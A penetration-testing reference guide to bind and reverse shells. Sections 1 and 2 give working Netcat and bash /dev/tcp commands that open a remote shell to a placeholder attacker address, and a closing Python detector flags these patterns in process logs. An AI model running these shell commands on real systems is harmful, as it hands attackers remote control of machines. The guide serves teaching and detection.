Bind and Reverse Shell Reference Guide

Outlines shell types, connection handling, and post-exploitation access techniques. Shows strong understanding of remote access control.

# Bind and Reverse Shell Listener Setup

This guide shows how to set up both **bind shells** and **reverse shells** using Netcat. These techniques are common in penetration testing for establishing remote command execution after a foothold is obtained.

---

## 1. Bind Shell

A bind shell is created on the **target system**.  
The target opens a listening port and waits for the attacker to connect.

### 1.1 Create a Bind Shell on the Target

```bash
nc -lvp 9001 -e /bin/bash
```

**Explanation:**

* `-l` starts Netcat in listen mode
* `-v` enables verbose output
* `-p 9001` binds to port 9001
* `-e /bin/bash` executes bash when a connection is made (only in Netcat builds that support `-e`)

This command turns the target machine into a listener that provides a shell when someone connects to the port.

### 1.2 Connect to the Bind Shell from the Attacker

```bash
nc <target-ip> 9001
```

After connecting, you receive remote command execution on the target through the bash process.

---

## 2. Reverse Shell

With a reverse shell, the listener runs on the **attacker system**.
The attacker sets up the listener, and the target initiates the outbound connection and attaches a shell to it.

Reverse shells are often more reliable because outbound connections are allowed in most environments.

### 2.1 Set Up the Listener on the Attacker

```bash
nc -lvnp 9001
```

**Explanation:**

* `-l` listen mode
* `-v` verbose
* `-n` avoid DNS lookups
* `-p 9001` listen on port 9001

### 2.2 Launch the Reverse Shell from the Target

Using bash:

```bash
bash -i >& /dev/tcp/<attacker-ip>/9001 0>&1
```

Using Netcat (if supported):

```bash
nc <attacker-ip> 9001 -e /bin/bash
```

After running the reverse connection, the attacker receives interactive shell access.

---

## 3. Summary of Use Cases

| Technique     | Listener Location | Connection Direction     | Typical Use                       |
| ------------- | ----------------- | ------------------------ | --------------------------------- |
| Bind Shell    | Target            | Attacker connects inward | When inbound ports are accessible |
| Reverse Shell | Attacker          | Target connects outward  | Works through firewalls and NAT   |

Reverse shells are the standard choice in most real engagements because outbound traffic is rarely blocked.
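For the defending side, the command lines above have recognisable shapes in process-execution logs. The following is an added example, not part of the original guide: it classifies command lines by the patterns from sections 1 and 2, using constructed sample events and an assumed list of Netcat binary names.

```python
import re
import shlex

# Netcat binary names to inspect (assumed list; extend for your fleet).
NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional"}
# bash socket redirect with stdin tied to the socket, as in section 2.2.
DEV_TCP_SHELL = re.compile(r">&?\s*/dev/tcp/[^/\s]+/\d+.*\b0[<>]&1")

def short_flags(tokens):
    """Collect single-letter flags, expanding bundles such as -lvnp."""
    flags = set()
    for tok in tokens:
        if tok.startswith("-") and not tok.startswith("--"):
            flags.update(tok[1:])
    return flags

def classify(cmdline):
    """Label one command line: bind-shell, reverse-shell, listener or None."""
    if DEV_TCP_SHELL.search(cmdline):
        return "reverse-shell"
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a truncated log field
        return None
    if not tokens or tokens[0].rsplit("/", 1)[-1] not in NC_NAMES:
        return None
    flags = short_flags(tokens[1:])
    if "e" in flags:  # -e hands the socket to a program
        return "bind-shell" if "l" in flags else "reverse-shell"
    return "listener" if "l" in flags else None

# Constructed sample events (host, command line); not real telemetry.
EVENTS = [
    ("web01", "nc -lvp 9001 -e /bin/bash"),
    ("web02", "bash -c 'bash -i >& /dev/tcp/203.0.113.5/9001 0>&1'"),
    ("db01", "/usr/bin/nc 203.0.113.5 9001 -e /bin/bash"),
    ("ops01", "nc -lvnp 9001"),
    ("ops01", "nc -z -w 3 192.0.2.10 443"),
    ("ops02", "bash -c 'echo > /dev/tcp/192.0.2.10/443'"),
]

def scan(events):
    """Return (host, label) for every event that matches a pattern."""
    hits = []
    for host, cmdline in events:
        label = classify(cmdline)
        if label:
            hits.append((host, label))
    return hits

if __name__ == "__main__":
    for host, label in scan(EVENTS):
        print(f"{host}: {label}")
```

The bash redirection is handled by the shell itself, so it appears in process arguments only when it is passed as a command string (for example via `bash -c`); an interactively typed one-liner needs shell history or network telemetry to catch.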

---